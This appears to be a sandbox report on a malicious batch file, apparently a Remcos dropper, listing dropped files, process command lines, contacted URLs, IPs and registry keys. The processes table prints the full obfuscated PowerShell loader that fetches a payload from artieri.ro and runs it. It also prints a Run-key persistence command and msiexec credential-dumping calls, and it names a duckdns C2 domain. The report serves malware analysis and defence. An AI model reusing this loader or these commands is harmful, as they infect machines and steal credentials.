Files
|
File Path
|
Type
|
Category
|
Malicious
|
|
|---|---|---|---|---|
|
SKU_0001710-1-2024-SX-3762.bat
|
ASCII text, with very long lines (5877), with no line terminators
|
initial sample
|
 |
|
|
C:\ProgramData\remcos\logs.dat
|
data
|
dropped
|
|
|
|
C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\3D003UC5\json[1].json
|
JSON data
|
dropped
|
||
|
C:\Users\user\AppData\Local\Microsoft\Windows\PowerShell\ModuleAnalysisCache
|
data
|
modified
|
||
|
C:\Users\user\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive
|
data
|
dropped
|
||
|
C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_0fgfek4u.niy.psm1
|
ASCII text, with no line terminators
|
dropped
|
||
|
C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_bhkd1xal.cpj.ps1
|
ASCII text, with no line terminators
|
dropped
|
||
|
C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_srbq4rmm.ccr.psm1
|
ASCII text, with no line terminators
|
dropped
|
||
|
C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_xio0a2hk.sne.ps1
|
ASCII text, with no line terminators
|
dropped
|
||
|
C:\Users\user\AppData\Local\Temp\bhv68C0.tmp
|
Extensible storage engine DataBase, version 0x620, checksum 0x2cb0b895, page size 32768, DirtyShutdown, Windows version 10.0
|
dropped
|
||
|
C:\Users\user\AppData\Local\Temp\cgtcjah
|
Unicode text, UTF-16, little-endian text, with no line terminators
|
dropped
|
||
|
C:\Users\user\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\590aee7bdd69b59b.customDestinations-ms (copy)
|
data
|
dropped
|
||
|
C:\Users\user\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\UHFP3GGVF4HVK4R7J17W.temp
|
data
|
dropped
|
||
|
C:\Users\user\AppData\Roaming\Rgnes.Und
|
ASCII text, with very long lines (65536), with no line terminators
|
dropped
|
There are 4 hidden files, click here to show them.
Processes
|
Path
|
Cmdline
|
Malicious
|
|
|---|---|---|---|
|
C:\Windows\System32\cmd.exe
|
C:\Windows\system32\cmd.exe /c ""C:\Users\user\Desktop\SKU_0001710-1-2024-SX-3762.bat" "
|
|
|
|
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
|
powershell.exe -windowstyle hidden " <#Derindad Telefonkdes Kroforvalterens knudshoveds #>;$Overimpressed215='Steroider115';<#Meso
Allittereredes Sidelngder Petroleumsovn Markedsfringsomkostning #>;$Omittancesforstrke116=$Beseemingness+$host.UI;function
Foreslaa($Tvivlstilfldet){If ($Omittancesforstrke116) {$Photoelectronics++;}$Transformationsprocesser=$Selskabsrevisors+$Tvivlstilfldet.'Length'-$Photoelectronics;
for( $Omittance=4;$Omittance -lt $Transformationsprocesser;$Omittance+=5){$Benzanthrone++;$Vandsskader+=$Tvivlstilfldet[$Omittance];$Styreformerne15='Uproblematiske';}$Vandsskader;}function
Heraclitean($Shagrag){ & ($Liljekonvals) ($Shagrag);}$Noden=Foreslaa 'CuprMTorpoStigzSc tiUninlS orlCarbaSkul/Lige
';$Noden+=Foreslaa 'Intr5 od.Slip0Poli Omf( Ed WBairiPreinRummd In oRandwHumosKjru FemaN recT Sta Ste1 Cab0Jux .Ixo 0 For;Sind
TalaWGorbiVaesnHem 6.tvk4Afst; v.d SattxSt.b6Kabo4p.lk; Pet Visur etev Udh:Khed1Agit3Brig1Else. Lai0Edul)Deli spirGSlage
rocLandkDemooW ys/ .ri2Di k0 .en1,ijo0Rest0Auto1Enla0Id.o1S am BosFAfskiMarkrP omeF ihf teo,entxRobo/U es1Sand3Trav1 Cou.Indl0a
em ';$Deglutitive=Foreslaa 'MotiuSne,SHjesE An.RBou - RedaOto G K tE chenN nsTOxgo ';$Spisekortet=Foreslaa 'Glach P.itSubstMod.pDogg:Tiec/
I.t/ConnaHererFesttu.viiansaeFa nr diriCi r.cl.nrDecaohypn/At ogSfol/TessSPersk R,liEksifSko f gale.uchrNor d ErnkTy ek Un
eBor re itsSprj.NunnpObstcEngrx.jla ';$Allineate=Foreslaa 'Fila>F.ru ';$Liljekonvals=Foreslaa '.amuIBisaePo.kxCor ';$Brneormens='Sybaritternes';$Omittanceronsided='\Rgnes.Und';Heraclitean
(Foreslaa 'Forb$Ko,fgShorLUnifOEpigBC moASaprlOmf :kautFPromOU gyZPoutIForfnSu,pe AddSLunesKins=Co.e$ Lu,eQuesNSvnlVDell:UnscanonvPRingpDisuDkakiA
omaTEquiAThys+Komp$ oodoSn wmU piiNoonTAwarTMag ABearnzibeCFortEUndeRKil o O,enYppesSystiAftedFarieDiopdMukk ');Heraclitean
(Foreslaa 'or a$SvorG L,vLCe.tOko,mbSolba HypLOut,:WaremWearA P arU,vojBenfU So,Nfor Sanop= Cos$ConuSH.ftPFan I IsosRochELat
k chaOUncorOmk,tCherelierTNe.p.Es asOrieP StrLS vsiLocutAfgi( Min$AkkuaG nzl CollPhalI BdeN higeS ngA ArmtIliaeTric) Sta ');Heraclitean
(Foreslaa 'Pane[EscoNMythEDrysTHelt.scotS nhETovbrPladvRdbrICentCAfb EVas p ynaOO.tbIBedsnParat VapM orkaForbnMarmapenngHoppeShirrHals].nal:Leve:,uttSHov
elovmcDisbU ,arRErriIEschTU bryDelkp AntRTeosOTunntKulkO NolCUdhooRendlPe.s Prey=Data U,or[ uleN ukeToldT Gez.Af,aSKl,keConscFormuNe
tRManuIGysetspiryPrevPc.arrunr,OStamtCe loPhasCStamoD sil NomtaqqaY F lpschiE Ufo]Fend:E.cy:Rstetw nwlOmk sBerr1For,2Siti
');$Spisekortet=$marjuns[0];$Resident=(Foreslaa 'Para$Carag,verl FebOForebSe mAbattLRveh: ordoGoosVW geE EverEupssSu cp Ad
rprofiG,lenI nkGHyraE,kerLskn.SCandEs bcRDe h=Fljenu.trE ExeWNon.-B skoBarnbTrskjWoodeOptrcUtydT Pre UncsWresY SansStertH,tteArmomPost.
ditnNitrET.avto pa. Sumw D mEZealb ealcSuboLUntwiPerie PrenIntetTh e ');Heraclitean ($Resident);Heraclitean (Foreslaa 'Hand$klagOPecuvDyste
HalrSt,msMundps,ntr ReniV ounTriagLygteS ralSplasKo oe Gadr.kol. LobHHugheTribaRet d CoveStatrA skstil [ sj $CentDelimeNazagTendlHuz.uNordtChoniisott
wh iHjlpvI,eneCaml]S an= pec$ SkaN G ooFrd dAusce PernBog ');$Nrme=Foreslaa 'Unec$embrO.dspvUnbeeHabirStorsEn.hpp.lyrBr.tiNgtenDemyg
lateIn rlKondsTalee tatrKomm.GodsDTricoHolowdc,an.ymplPortoUnpaaDemod SueFGradiBroklTeleeOnch(,ust$tilgSTjrepUmedi BunsHastespeakS
aaoComprTilktSku eprictFort,El r$M ltUSyntnFoendCi,ieForlrToeiaPassfHydrkInfelBo b)Ge a ';$Underafkl=$foziness;Heraclitean
(Foreslaa 'Etio$,iveGDeioLCucko BruBPe,tAP.olLP,ri:Re,eFIndpLSinuO H moSilisdisqiBreiEKaloS Beg1Narr8.lag6 Acc=Bund(IndgtFon
EFormsOlietUnde-Diskp .ulaPro TPa,fh ub A te$Vic,ufyrbNKaradUdfoEBesmR St,aTop.F Hy KForflWa,e) Re ');while (!$Floosies186)
{Heraclitean (Foreslaa 'Hoft$IndlgArmllVurdoEr,tbAnmeaV.lul Tux:RedaCPercrMikkeImfcaDisatStrue RemsBjer=Opbe$VisttStarrWhauu
M,me Man ') ;Heraclitean $Nrme;Heraclitean (Foreslaa 'S alsforkTPrehA iar d sT,orh- ChrsPro lAnd.EUdm,e BalPCha, Bol4Hvep
');Heraclitean (Foreslaa 'Eth $BiotGFodklDyreoFetibSupeAPjanLPo a:Sem fBlablBasiOdjakOmusoSTirsIMetaeOld SSk o1Chur8 Paa6Eng
=Manc(Nonet FatEWh rSSa.et G a-Ov rPRevoaCi,atBoycHvolu Trif$Ref UBombnCamodros eAntiRS peaAltafAgu kTripLHydr)Rece ') ;Heraclitean
(Foreslaa 'Cara$ isgHumiL ConomistBunnaAKrumlOpaq:PseugOverlVidnu La T ousCHearh Tek= Pe $Var gAkkoLC mpO GrabPas,aT,lll
Gra:Ta.sRstetuDisdtS ciIF,leNE sueSty r SkuE SattDump+Indt+Efte% Mol$PapuMB.agA StaRGrupjH.lduObseNgru STi.f.FremCNatiODebiuSpirn
HjrtReka ') ;$Spisekortet=$marjuns[$Glutch];}$khalil=314533;$Humdrumness=30402;Heraclitean (Foreslaa ' ogh$ lgegJernL blnoex,ebPreoaContlTarh:Sa
dFTalli MegN MedGphoteO strInteWElitoAs erAttrkPavi Afm= arn SneaGv.gteSlottInds-c itCE,phoNonpN sekTStjeeIndunFisktFast
Ret$Nonauunhen ildU grEU hyRhy.oAHedaFFirekIntrlRaad ');Heraclitean (Foreslaa 'Sky $k.ttghonklSalooMiscbF rma dmilT,re:,bjeBB.colMicriAn
lcProtkStraeRecoyStoc Disc= Syr nedt[CospSAmp yUnhys FhotBefle kammDamb.TinfCTetroToyinFamivGst eFedtrAuritPneu]R.go:Ayou:DampF
Milr omoEx pmIrbiBEfteaYndlsFieleUnmi6Haem4LugeSfngst ronrMassiCabbnPectgExen(Reta$ CreF TiliS otnforkgReumeH.pprBilawImmooHekhrFormk
All)Svrt ');Heraclitean (Foreslaa 'Coun$PrecGScanLS.inoKultBlamiaDr,tlYlva:Le,lUGodbPBortH,ounhTrauoStorvEfteE Tid Visi=Du
d Fejl[ oths P lyUnemS,necT GloERevimOu.e.Ma stPsameGlycx BevtIacc. VicEHalvNBehacBrylo.lyaDfr diFny n ArgGForb]Frds:ove.:AbscAFormSTrilc
Sk.iProei Tru.ScapGBrneEMolatUnbrs hagTIllerAfluiExhon,akkGFun ( S b$ akkbBusmlTr.aI,tancpr bKMange RhoYLo,a)Bron ');Heraclitean
(Foreslaa 'pleu$BilaGSpidlSha OUppebPsycaHom LBaha:SkalHKdkrYFlocPBywaETot R SarPPan.YDa rr AssAAssemStimiRedlDHipf=Met $VelvuBiogP
MedH dmHLionOAa eVDemoE,ejl.Opris veruTwisbnonoSUt.hT vatR jasIB,adnGli.G,nar(Sel $minik unkhExena OmplCumbIja.bLFork,Inco$
U rhStatuSubsmFolkDKroprmaegUA,grm LatNTylveS,ols LysS ynt) ina ');Heraclitean $Hyperpyramid;"
|
|
|
|
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
|
"C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe" " <#Derindad Telefonkdes Kroforvalterens knudshoveds #>;$Overimpressed215='Steroider115';<#Meso
Allittereredes Sidelngder Petroleumsovn Markedsfringsomkostning #>;$Omittancesforstrke116=$Beseemingness+$host.UI;function
Foreslaa($Tvivlstilfldet){If ($Omittancesforstrke116) {$Photoelectronics++;}$Transformationsprocesser=$Selskabsrevisors+$Tvivlstilfldet.'Length'-$Photoelectronics;
for( $Omittance=4;$Omittance -lt $Transformationsprocesser;$Omittance+=5){$Benzanthrone++;$Vandsskader+=$Tvivlstilfldet[$Omittance];$Styreformerne15='Uproblematiske';}$Vandsskader;}function
Heraclitean($Shagrag){ & ($Liljekonvals) ($Shagrag);}$Noden=Foreslaa 'CuprMTorpoStigzSc tiUninlS orlCarbaSkul/Lige
';$Noden+=Foreslaa 'Intr5 od.Slip0Poli Omf( Ed WBairiPreinRummd In oRandwHumosKjru FemaN recT Sta Ste1 Cab0Jux .Ixo 0 For;Sind
TalaWGorbiVaesnHem 6.tvk4Afst; v.d SattxSt.b6Kabo4p.lk; Pet Visur etev Udh:Khed1Agit3Brig1Else. Lai0Edul)Deli spirGSlage
rocLandkDemooW ys/ .ri2Di k0 .en1,ijo0Rest0Auto1Enla0Id.o1S am BosFAfskiMarkrP omeF ihf teo,entxRobo/U es1Sand3Trav1 Cou.Indl0a
em ';$Deglutitive=Foreslaa 'MotiuSne,SHjesE An.RBou - RedaOto G K tE chenN nsTOxgo ';$Spisekortet=Foreslaa 'Glach P.itSubstMod.pDogg:Tiec/
I.t/ConnaHererFesttu.viiansaeFa nr diriCi r.cl.nrDecaohypn/At ogSfol/TessSPersk R,liEksifSko f gale.uchrNor d ErnkTy ek Un
eBor re itsSprj.NunnpObstcEngrx.jla ';$Allineate=Foreslaa 'Fila>F.ru ';$Liljekonvals=Foreslaa '.amuIBisaePo.kxCor ';$Brneormens='Sybaritternes';$Omittanceronsided='\Rgnes.Und';Heraclitean
(Foreslaa 'Forb$Ko,fgShorLUnifOEpigBC moASaprlOmf :kautFPromOU gyZPoutIForfnSu,pe AddSLunesKins=Co.e$ Lu,eQuesNSvnlVDell:UnscanonvPRingpDisuDkakiA
omaTEquiAThys+Komp$ oodoSn wmU piiNoonTAwarTMag ABearnzibeCFortEUndeRKil o O,enYppesSystiAftedFarieDiopdMukk ');Heraclitean
(Foreslaa 'or a$SvorG L,vLCe.tOko,mbSolba HypLOut,:WaremWearA P arU,vojBenfU So,Nfor Sanop= Cos$ConuSH.ftPFan I IsosRochELat
k chaOUncorOmk,tCherelierTNe.p.Es asOrieP StrLS vsiLocutAfgi( Min$AkkuaG nzl CollPhalI BdeN higeS ngA ArmtIliaeTric) Sta ');Heraclitean
(Foreslaa 'Pane[EscoNMythEDrysTHelt.scotS nhETovbrPladvRdbrICentCAfb EVas p ynaOO.tbIBedsnParat VapM orkaForbnMarmapenngHoppeShirrHals].nal:Leve:,uttSHov
elovmcDisbU ,arRErriIEschTU bryDelkp AntRTeosOTunntKulkO NolCUdhooRendlPe.s Prey=Data U,or[ uleN ukeToldT Gez.Af,aSKl,keConscFormuNe
tRManuIGysetspiryPrevPc.arrunr,OStamtCe loPhasCStamoD sil NomtaqqaY F lpschiE Ufo]Fend:E.cy:Rstetw nwlOmk sBerr1For,2Siti
');$Spisekortet=$marjuns[0];$Resident=(Foreslaa 'Para$Carag,verl FebOForebSe mAbattLRveh: ordoGoosVW geE EverEupssSu cp Ad
rprofiG,lenI nkGHyraE,kerLskn.SCandEs bcRDe h=Fljenu.trE ExeWNon.-B skoBarnbTrskjWoodeOptrcUtydT Pre UncsWresY SansStertH,tteArmomPost.
ditnNitrET.avto pa. Sumw D mEZealb ealcSuboLUntwiPerie PrenIntetTh e ');Heraclitean ($Resident);Heraclitean (Foreslaa 'Hand$klagOPecuvDyste
HalrSt,msMundps,ntr ReniV ounTriagLygteS ralSplasKo oe Gadr.kol. LobHHugheTribaRet d CoveStatrA skstil [ sj $CentDelimeNazagTendlHuz.uNordtChoniisott
wh iHjlpvI,eneCaml]S an= pec$ SkaN G ooFrd dAusce PernBog ');$Nrme=Foreslaa 'Unec$embrO.dspvUnbeeHabirStorsEn.hpp.lyrBr.tiNgtenDemyg
lateIn rlKondsTalee tatrKomm.GodsDTricoHolowdc,an.ymplPortoUnpaaDemod SueFGradiBroklTeleeOnch(,ust$tilgSTjrepUmedi BunsHastespeakS
aaoComprTilktSku eprictFort,El r$M ltUSyntnFoendCi,ieForlrToeiaPassfHydrkInfelBo b)Ge a ';$Underafkl=$foziness;Heraclitean
(Foreslaa 'Etio$,iveGDeioLCucko BruBPe,tAP.olLP,ri:Re,eFIndpLSinuO H moSilisdisqiBreiEKaloS Beg1Narr8.lag6 Acc=Bund(IndgtFon
EFormsOlietUnde-Diskp .ulaPro TPa,fh ub A te$Vic,ufyrbNKaradUdfoEBesmR St,aTop.F Hy KForflWa,e) Re ');while (!$Floosies186)
{Heraclitean (Foreslaa 'Hoft$IndlgArmllVurdoEr,tbAnmeaV.lul Tux:RedaCPercrMikkeImfcaDisatStrue RemsBjer=Opbe$VisttStarrWhauu
M,me Man ') ;Heraclitean $Nrme;Heraclitean (Foreslaa 'S alsforkTPrehA iar d sT,orh- ChrsPro lAnd.EUdm,e BalPCha, Bol4Hvep
');Heraclitean (Foreslaa 'Eth $BiotGFodklDyreoFetibSupeAPjanLPo a:Sem fBlablBasiOdjakOmusoSTirsIMetaeOld SSk o1Chur8 Paa6Eng
=Manc(Nonet FatEWh rSSa.et G a-Ov rPRevoaCi,atBoycHvolu Trif$Ref UBombnCamodros eAntiRS peaAltafAgu kTripLHydr)Rece ') ;Heraclitean
(Foreslaa 'Cara$ isgHumiL ConomistBunnaAKrumlOpaq:PseugOverlVidnu La T ousCHearh Tek= Pe $Var gAkkoLC mpO GrabPas,aT,lll
Gra:Ta.sRstetuDisdtS ciIF,leNE sueSty r SkuE SattDump+Indt+Efte% Mol$PapuMB.agA StaRGrupjH.lduObseNgru STi.f.FremCNatiODebiuSpirn
HjrtReka ') ;$Spisekortet=$marjuns[$Glutch];}$khalil=314533;$Humdrumness=30402;Heraclitean (Foreslaa ' ogh$ lgegJernL blnoex,ebPreoaContlTarh:Sa
dFTalli MegN MedGphoteO strInteWElitoAs erAttrkPavi Afm= arn SneaGv.gteSlottInds-c itCE,phoNonpN sekTStjeeIndunFisktFast
Ret$Nonauunhen ildU grEU hyRhy.oAHedaFFirekIntrlRaad ');Heraclitean (Foreslaa 'Sky $k.ttghonklSalooMiscbF rma dmilT,re:,bjeBB.colMicriAn
lcProtkStraeRecoyStoc Disc= Syr nedt[CospSAmp yUnhys FhotBefle kammDamb.TinfCTetroToyinFamivGst eFedtrAuritPneu]R.go:Ayou:DampF
Milr omoEx pmIrbiBEfteaYndlsFieleUnmi6Haem4LugeSfngst ronrMassiCabbnPectgExen(Reta$ CreF TiliS otnforkgReumeH.pprBilawImmooHekhrFormk
All)Svrt ');Heraclitean (Foreslaa 'Coun$PrecGScanLS.inoKultBlamiaDr,tlYlva:Le,lUGodbPBortH,ounhTrauoStorvEfteE Tid Visi=Du
d Fejl[ oths P lyUnemS,necT GloERevimOu.e.Ma stPsameGlycx BevtIacc. VicEHalvNBehacBrylo.lyaDfr diFny n ArgGForb]Frds:ove.:AbscAFormSTrilc
Sk.iProei Tru.ScapGBrneEMolatUnbrs hagTIllerAfluiExhon,akkGFun ( S b$ akkbBusmlTr.aI,tancpr bKMange RhoYLo,a)Bron ');Heraclitean
(Foreslaa 'pleu$BilaGSpidlSha OUppebPsycaHom LBaha:SkalHKdkrYFlocPBywaETot R SarPPan.YDa rr AssAAssemStimiRedlDHipf=Met $VelvuBiogP
MedH dmHLionOAa eVDemoE,ejl.Opris veruTwisbnonoSUt.hT vatR jasIB,adnGli.G,nar(Sel $minik unkhExena OmplCumbIja.bLFork,Inco$
U rhStatuSubsmFolkDKroprmaegUA,grm LatNTylveS,ols LysS ynt) ina ');Heraclitean $Hyperpyramid;"
|
|
|
|
C:\Windows\SysWOW64\msiexec.exe
|
"C:\Windows\SysWOW64\msiexec.exe"
|
|
|
|
C:\Windows\SysWOW64\msiexec.exe
|
C:\Windows\System32\msiexec.exe /stext "C:\Users\user\AppData\Local\Temp\cgtcjah"
|
|
|
|
C:\Windows\SysWOW64\msiexec.exe
|
C:\Windows\System32\msiexec.exe /stext "C:\Users\user\AppData\Local\Temp\miynksssgv"
|
|
|
|
C:\Windows\SysWOW64\msiexec.exe
|
C:\Windows\System32\msiexec.exe /stext "C:\Users\user\AppData\Local\Temp\miynksssgv"
|
|
|
|
C:\Windows\SysWOW64\msiexec.exe
|
C:\Windows\System32\msiexec.exe /stext "C:\Users\user\AppData\Local\Temp\pclglkctcdois"
|
|
|
|
C:\Windows\System32\conhost.exe
|
C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
|
||
|
C:\Windows\System32\conhost.exe
|
C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
|
||
|
C:\Windows\System32\conhost.exe
|
C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
|
||
|
C:\Windows\SysWOW64\cmd.exe
|
"C:\Windows\System32\cmd.exe" /c REG ADD HKCU\Software\Microsoft\Windows\CurrentVersion\Run /f /v "Hvidtning81" /t REG_EXPAND_SZ
/d "%Greenlets% -windowstyle 1 $Idlers=(gp -Path 'HKCU:\Software\Europiser153\').cricetidae;%Greenlets% ($Idlers)"
|
||
|
C:\Windows\System32\conhost.exe
|
C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
|
||
|
C:\Windows\SysWOW64\reg.exe
|
REG ADD HKCU\Software\Microsoft\Windows\CurrentVersion\Run /f /v "Hvidtning81" /t REG_EXPAND_SZ /d "%Greenlets% -windowstyle
1 $Idlers=(gp -Path 'HKCU:\Software\Europiser153\').cricetidae;%Greenlets% ($Idlers)"
|
There are 4 hidden processes, click here to show them.
URLs
|
Name
|
IP
|
Malicious
|
|
|---|---|---|---|
|
renajazinw.duckdns.org
|
|
||
|
http://www.imvu.comr
|
unknown
|
||
|
https://M365CDN.nel.measure.office.net/api/report?FrontEnd=VerizonCDNWorldWide&DestinationEndpoint=W
|
unknown
|
||
|
http://www.imvu.comta
|
unknown
|
||
|
https://ow1.res.office365.com/apc/trans.gif?29331761644ba41ebf9abf96ecc6fbad
|
unknown
|
||
|
https://aefd.nelreports.net/api/report?cat=bingth
|
unknown
|
||
|
https://86dd05e6f545b5502aade4a1946d3e9d.azr.footprintdns.com/apc/trans.gif?66601c3b572f284b9da07fcc
|
unknown
|
||
|
https://contoso.com/License
|
unknown
|
||
|
http://artieri.ro/g/Skifferdkkers.pcx
|
89.44.138.129
|
||
|
http://www.nirsoft.net
|
unknown
|
||
|
https://aefd.nelreports.net/api/report?cat=bingaotak
|
unknown
|
||
|
https://deff.nelreports.net/api/report?cat=msn
|
unknown
|
||
|
https://ecs.nel.measure.office.net?TenantId=ODSP_Sync_Client&DestinationEndpoint=Edge-Prod-BLUr5a&Fr
|
unknown
|
||
|
https://58293426822f9aaf9d7c729f28294583.azr.footprintdns.com/apc/trans.gif?fc66b8a78ab7a1394f56e742
|
unknown
|
||
|
https://ecs.nel.measure.office.net?TenantId=ODSP_Sync_Client&DestinationEndpoint=Edge-Prod-BL2r8e&Fr
|
unknown
|
||
|
http://artieri.ro/g/MihrGCaVzvslPdUujzk140.bin
|
89.44.138.129
|
||
|
http://www.imvu.comhttp://www.ebuddy.comhttps://www.google.com
|
unknown
|
||
|
https://rum8.perf.linkedin.com/apc/trans.gif?fe61b216ccbcc1bca02cb20f2e94fb51
|
unknown
|
||
|
https://www.google.com
|
unknown
|
||
|
http://geoplugin.net/json.gpC
|
unknown
|
||
|
https://fp-afdx-bpdee4gtg6frejfd.z01.azurefd.net/apc/trans.gif?a9bddedb22fa9ee1d455a5d5a89b950c
|
unknown
|
||
|
http://geoplugin.net/json.gpH
|
unknown
|
||
|
https://artieri.ro/
|
unknown
|
||
|
https://aka.ms/pscore6lB
|
unknown
|
||
|
https://maps.windows.com/windows-app-web-link
|
unknown
|
||
|
https://cxcs.microsoft.net/api/settings/en-GB/xml/settings-tipset?release=20h1&sku=Professional&plat
|
unknown
|
||
|
http://geoplugin.net/json.gpP
|
unknown
|
||
|
https://contoso.com/
|
unknown
|
||
|
https://nuget.org/nuget.exe
|
unknown
|
||
|
http://geoplugin.net/json.gpxe
|
unknown
|
||
|
https://fp-afdx-bpdee4gtg6frejfd.z01.azurefd.net/apc/trans.gif?60caefc8ca640843bccad421cfaadcc8
|
unknown
|
||
|
https://login.yahoo.com/config/login
|
unknown
|
||
|
http://www.nirsoft.net/
|
unknown
|
||
|
http://schemas.xmlsoap.org/ws/2005/05/identity/claims/name
|
unknown
|
||
|
https://ow1.res.office365.com/apc/trans.gif?17a81fd4cdc7fc73a2b4cf5b67ff816d
|
unknown
|
||
|
http://geoplugin.net/json.gp_
|
unknown
|
||
|
https://86dd05e6f545b5502aade4a1946d3e9d.azr.footprintdns.com/apc/trans.gif?f67d919da1a9ba8a5672367d
|
unknown
|
||
|
https://assets.msn.com/weathermapdata/1/static/weather/Icons/JyNGQgA=/Condition/AAehR3S.svg
|
unknown
|
||
|
https://www.office.com/
|
unknown
|
||
|
http://nuget.org/NuGet.exe
|
unknown
|
||
|
https://ow1.res.office365.com/apc/trans.gif?2f153f40414852a5ead98f4103d563a8
|
unknown
|
||
|
https://acae307a6acdd4e64531be6276770618.azr.footprintdns.com/apc/trans.gif?a176b93f037f93b5720edf68
|
unknown
|
||
|
https://sin06prdapp01-canary-opaph.netmon.azure.com/apc/trans.gif?909b77fc750668f20e07288ff0ed43e2
|
unknown
|
||
|
http://pesterbdd.com/images/Pester.png
|
unknown
|
||
|
https://18a72a1f5c7b170c6cc0a459d463264e.azr.footprintdns.com/apc/trans.gif?c9b5e9d2b836931c8ddd4e8d
|
unknown
|
||
|
http://geoplugin.net/json.gpk
|
unknown
|
||
|
http://www.apache.org/licenses/LICENSE-2.0.html
|
unknown
|
||
|
https://go.micro
|
unknown
|
||
|
https://18a72a1f5c7b170c6cc0a459d463264e.azr.footprintdns.com/apc/trans.gif?18b635b804a8d6ad0a1fa437
|
unknown
|
||
|
http://www.imvu.com
|
unknown
|
||
|
https://aefd.nelreports.net/api/report?cat=wsb
|
unknown
|
||
|
https://contoso.com/Icon
|
unknown
|
||
|
https://acae307a6acdd4e64531be6276770618.azr.footprintdns.com/apc/trans.gif?467894188c5d788807342326
|
unknown
|
||
|
https://artieri.ro
|
unknown
|
||
|
http://geoplugin.net/json.gpxe2
|
unknown
|
||
|
https://github.com/Pester/Pester
|
unknown
|
||
|
https://4c4f378c706610974da9cb9d99fe3116.azr.footprintdns.com/apc/trans.gif?1c89d9658c6af83a02d98b03
|
unknown
|
||
|
http://geoplugin.net/json.gp
|
178.237.33.50
|
||
|
https://artieri.ro/g/MihrGCaVzvslPdUujzk140.bin%
|
unknown
|
||
|
http://crl.micro
|
unknown
|
||
|
https://aefd.nelreports.net/api/report?cat=bingaot
|
unknown
|
||
|
https://login.windows.net/common/oauth2/authorize?response_type=code&client_id=d3590ed6-52b3-4102-ae
|
unknown
|
||
|
https://artieri.ro/g/MihrGCaVzvslPdUujzk140.bin
|
89.44.138.129
|
||
|
http://artieri.ro
|
unknown
|
||
|
https://4c4f378c706610974da9cb9d99fe3116.azr.footprintdns.com/apc/trans.gif?74b620657ac570f7999e6ad7
|
unknown
|
||
|
http://artieri.ro/g/Skifferdkkers.pcxXR
|
unknown
|
||
|
http://artieri.ro/g/MihrGCaVzvslPdUujzk140.binT
|
unknown
|
||
|
http://artieri.ro/g/MihrGCaVzvslPdUujzk140.binU
|
unknown
|
||
|
https://ecs.nel.measure.office.net?TenantId=Skype&DestinationEndpoint=Edge-Prod-BL2r8e&FrontEnd=AFD
|
unknown
|
||
|
https://aefd.nelreports.net/api/report?cat=bingrms
|
unknown
|
||
|
https://rum8.perf.linkedin.com/apc/trans.gif?690daf9375f3d267a5b7b08fbc174993
|
unknown
|
||
|
https://www.google.com/accounts/servicelogin
|
unknown
|
||
|
https://58293426822f9aaf9d7c729f28294583.azr.footprintdns.com/apc/trans.gif?cf2d8bf3b68a3e37eef992d5
|
unknown
|
||
|
https://aka.ms/pscore68
|
unknown
|
||
|
https://login.microsoftonline.com/common/oauth2/authorize?response_type=code&client_id=d3590ed6-52b3
|
unknown
|
||
|
https://ow1.res.office365.com/apc/trans.gif?a50e32ebd978eda4d21928b1dbc78135
|
unknown
|
||
|
https://artieri.ro/g/Skifferdkkers.pcx
|
89.44.138.129
|
||
|
https://sin06prdapp01-canary-opaph.netmon.azure.com/apc/trans.gif?c6931b9e725f95cf9c20849dd6498c59
|
unknown
|
||
|
http://www.ebuddy.com
|
unknown
|
There are 69 hidden URLs, click here to show them.
Domains
|
Name
|
IP
|
Malicious
|
|
|---|---|---|---|
|
renajazinw.duckdns.org
|
193.187.91.216
|
|
|
|
artieri.ro
|
89.44.138.129
|
||
|
geoplugin.net
|
178.237.33.50
|
IPs
|
IP
|
Domain
|
Country
|
Malicious
|
|
|---|---|---|---|---|
|
193.187.91.216
|
renajazinw.duckdns.org
|
Sweden
|
|
|
|
89.44.138.129
|
artieri.ro
|
Romania
|
||
|
178.237.33.50
|
geoplugin.net
|
Netherlands
|
Registry
|
Path
|
Value
|
Malicious
|
|
|---|---|---|---|
|
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Tracing\powershell_RASAPI32
|
EnableFileTracing
|
||
|
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Tracing\powershell_RASAPI32
|
EnableAutoFileTracing
|
||
|
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Tracing\powershell_RASAPI32
|
EnableConsoleTracing
|
||
|
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Tracing\powershell_RASAPI32
|
FileTracingMask
|
||
|
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Tracing\powershell_RASAPI32
|
ConsoleTracingMask
|
||
|
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Tracing\powershell_RASAPI32
|
MaxFileSize
|
||
|
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Tracing\powershell_RASAPI32
|
FileDirectory
|
||
|
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Tracing\powershell_RASMANCS
|
EnableFileTracing
|
||
|
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Tracing\powershell_RASMANCS
|
EnableAutoFileTracing
|
||
|
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Tracing\powershell_RASMANCS
|
EnableConsoleTracing
|
||
|
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Tracing\powershell_RASMANCS
|
FileTracingMask
|
||
|
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Tracing\powershell_RASMANCS
|
ConsoleTracingMask
|
||
|
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Tracing\powershell_RASMANCS
|
MaxFileSize
|
||
|
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Tracing\powershell_RASMANCS
|
FileDirectory
|
||
|
HKEY_CURRENT_USER\SOFTWARE\Europiser153
|
cricetidae
|
||
|
